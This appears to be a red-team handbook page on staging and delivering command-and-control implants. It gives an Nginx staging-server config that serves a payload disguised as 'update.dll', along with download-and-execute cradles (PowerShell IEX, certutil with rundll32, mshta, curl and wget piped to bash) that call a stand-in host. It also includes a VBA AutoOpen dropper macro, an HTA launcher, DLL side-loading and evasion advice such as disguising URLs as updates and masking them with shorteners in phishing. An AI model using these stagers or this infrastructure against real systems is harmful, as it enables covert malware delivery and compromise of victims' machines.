Payload Staging and Delivery
#Overview
Payload staging determines how the implant reaches the target. Staged payloads download the full implant at runtime (smaller initial footprint), while stageless payloads contain everything in one file (simpler but larger). This section covers staging strategies, delivery methods, and infrastructure lifecycle management.
#Staged vs Stageless
| Aspect | Staged | Stageless |
|---|---|---|
| Size (initial) | Small (stager: ~15KB) | Large (full implant: ~300KB+) |
| Network calls | Two (stager download + C2) | One (C2 connection) |
| Detection risk | Higher (two connections, staging URL) | Lower (single connection) |
| Flexibility | Can rotate payload after initial access | Must recompile to change |
| EDR evasion | Harder (stager behavior flagged) | Easier (single file, no download) |
| When to use | Disk space constrained, need flexibility | EDR-heavy environments |
#Staged Payload Architecture
1. Initial Access: Target executes stager (15KB)
2. Stager connects to staging URL (via redirector)
3. Stager downloads full implant (300KB)
4. Implant executes and connects to C2 (via redirector)
5. Stager self-deletes
TEXT
#Staging Server Setup
The staging server sits behind the redirector and serves the full implant to stagers.
# Staging server Nginx config (separate from C2 redirector)
server {
listen 443 ssl;
server_name staging.c2-front.com;
ssl_certificate /etc/letsencrypt/live/staging.c2-front.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/staging.c2-front.com/privkey.pem;
# Only serve staging payload to valid stagers
location /gateway/ {
# Verify stager token
if ($http_x_stager_token != "random-secret-token") {
return 404;
}
# Serve the implant payload
alias /opt/staging/payload.exe;
default_type application/octet-stream;
add_header Content-Disposition 'attachment; filename="update.dll"';
}
# Cover traffic: serve legitimate files
location / {
root /var/www/cover-site;
}
}
NGINX
#Stager Examples
PowerShell Cradle (Windows)
# Download and execute in memory (no file on disk)
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://staging.c2-front.com/gateway/')"
# With TLS 1.2 enforcement
powershell -nop -w hidden -c "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https://staging.c2-front.com/gateway/')"
# Using Invoke-WebRequest (PowerShell 3+)
powershell -nop -w hidden -c "IWR -Uri 'https://staging.c2-front.com/gateway/' -UseBasicParsing | IEX"
POWERSHELL
certutil (Windows)
:: Download payload
certutil -urlcache -split -f https://staging.c2-front.com/gateway/update.dll C:\Windows\Temp\update.dll
:: Execute
rundll32 C:\Windows\Temp\update.dll,Start
:: Clean up certutil cache
certutil -urlcache -split -f https://staging.c2-front.com/gateway/update.dll delete
CMD
mshta (Windows)
:: Execute HTA payload from staging server
mshta https://staging.c2-front.com/gateway/payload.hta
CMD
curl (Linux)
# Download and execute
curl -s https://staging.c2-front.com/gateway/ | bash
# Download, save, chmod, execute
curl -s -o /tmp/update https://staging.c2-front.com/gateway/
chmod +x /tmp/update
/tmp/update &
BASH
wget (Linux)
# Download and execute
wget -qO- https://staging.c2-front.com/gateway/ | bash
# Download to file
wget -q -O /tmp/update https://staging.c2-front.com/gateway/
chmod +x /tmp/update
/tmp/update &
BASH
#Stageless Payload Delivery
For environments with strict egress monitoring, deliver the full implant directly without a staging step.
#Delivery Methods
Macro-Enabled Document
' VBA macro that extracts and runs embedded payload
Sub AutoOpen()
Dim payload() As Byte
' Read embedded payload from document properties or resource
payload = GetEmbeddedPayload()
' Write to temp file
Dim fnum As Integer
fnum = FreeFile
Open Environ("TEMP") & "\svc.dll" For Binary As #fnum
Put #fnum, , payload
Close #fnum
' Execute
Shell "rundll32 " & Environ("TEMP") & "\svc.dll,Start", vbHide
End Sub
VB
HTA File
<html>
<body>
<script language="VBScript">
Set shell = CreateObject("WScript.Shell")
' Embed base64-encoded payload, decode and execute
shell.Run "powershell -nop -w hidden -enc <base64_encoded_command>"
window.close()
</script>
</body>
</html>
HTML
DLL Side-Loading
# Place a legitimate executable and a malicious DLL with the same name
# The legitimate exe loads the malicious DLL at startup
# Example: put malicious version.dll next to legitimate.exe
# On the target:
legitimate.exe # Loads version.dll → executes payload → connects to C2
BASH
#Infrastructure Lifecycle
#Phase 1: Setup
# 1. Register domain (privacy-protected registrar)
# 2. Provision VPS instances (3x redirector, 1x team server)
# 3. Configure DNS (low TTL: 300s for rotation flexibility)
# 4. Deploy redirectors (Ansible/Terraform)
# 5. Start C2 team server
# 6. Generate Let's Encrypt certificates
# 7. Test end-to-end connectivity
BASH
#Phase 2: Validate
# 1. Verify redirector filters work (curl with wrong UA should get 404)
curl -A "invalid-ua" https://c2-front.com/api/v1/
# Expected: 404 or cover content
# 2. Verify valid C2 traffic reaches team server
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://c2-front.com/api/v1/
# Expected: C2 response
# 3. Verify TLS certificate is valid
openssl s_client -connect c2-front.com:443 | grep "Verify return code"
# Expected: 0 (ok)
# 4. Test implant in a VM before deploying
# Verify it connects, receives tasks, and returns results
# 5. Verify cover website works
curl https://c2-front.com/
# Expected: legitimate-looking content
BASH
#Phase 3: Use
# 1. Deploy staged or stageless payload to target
# 2. Monitor implant connections through redirectors
# 3. Verify traffic flows: implant → CDN → redirector → team server
# 4. Conduct operations through C2
BASH
#Phase 4: Rotate
# Rotate when:
# - Redirector IP is detected/blocked
# - Domain is flagged
# - Unusual traffic patterns on redirector
# - Scheduled rotation (every 48-72 hours)
# Rotation steps:
# 1. Deploy new redirector (same config, new IP)
# 2. Update DNS A record (TTL 300s → fast propagation)
# 3. Verify new redirector works
# 4. Implant auto-reconnects via DNS
# 5. Decommission old VPS (destroy, don't just stop)
BASH
#Phase 5: Decommission
# After engagement:
# 1. Stop all implants (or let kill dates expire)
# 2. Destroy all VPS instances
# 3. Cancel domain registration or let it expire
# 4. Delete DNS records
# 5. Revoke Let's Encrypt certificates
# 6. Delete any local logs/screenshots with infrastructure details
# 7. Confirm no lingering VPS charges
BASH
#Common Pitfalls
- Staging URL in binary: Stagers contain the staging URL in plaintext. If the binary is analyzed, the staging infrastructure is burned.
- Single point of failure: One redirector going down drops all C2. Use DNS round-robin or multiple A records.
- Certificate mismatch: If the staging server cert doesn't match, the implant may refuse to connect.
- Kill date not set: Implants that persist after the engagement are a liability. Always set kill dates.
- Cover site too simple: A single-page HTML cover site is suspicious. Use a full website template.
#OPSEC Considerations
- Use short-lived Let's Encrypt certificates (90-day auto-renewal)
- Set kill dates on all implants (match engagement end date + buffer)
- Use multiple staging URLs for redundancy
- Rotate staging URLs independently of C2 redirectors
- Log all access to staging servers for detection awareness
- Payload delivery URLs should look like legitimate software updates
- Use URL shorteners to mask staging URLs in phishing
#Cross-References
- C2 Framework Setup — Team server and listener configuration
- Redirectors & Fronting — Redirector and CDN setup
- Cloud Tunnels — Cloud-based staging servers
- 03 - Initial Access — Payload delivery techniques